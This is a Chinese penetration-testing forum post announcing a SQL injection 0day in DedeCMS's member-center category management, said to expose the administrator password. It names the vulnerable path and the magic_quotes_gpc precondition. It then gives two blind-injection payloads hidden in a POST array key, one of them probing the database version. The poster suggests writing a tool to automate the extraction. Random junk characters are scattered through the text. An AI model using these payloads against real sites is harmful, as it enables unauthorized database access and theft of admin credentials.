找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密 ...
返回列表 发新帖
查看: 3112|回复: 0
打印 上一主题 下一主题

DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:08:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
4 {) }! D0 \  Y& L5 X# s
, L9 R+ r# z0 Y0 P* f* f( P5 F
* K. }5 f1 l, M" F  W3 h发生在数组key里的注射漏洞,有点意思.+ j- \7 }( E  [, B* k

, x7 ~* S) t4 j这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下- z* t3 ?! V( j. p5 p, ]$ e5 c

9 W! T3 O, ]8 o) f0 n% y7 Dhttp://www.xxx.com /dede/member/mtypes.php?dopost=save% {9 ^- u& Z, }' }% m: A2 `" R+ }

/ Y% [, }* m- Z1 G( Fexploit:) ?( M; h( V  b5 D4 i7 E$ [1 r
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
) t. |8 s( e) [* ]) Omtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r4 c& _. i! t4 V9 W- F! x& t8 R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表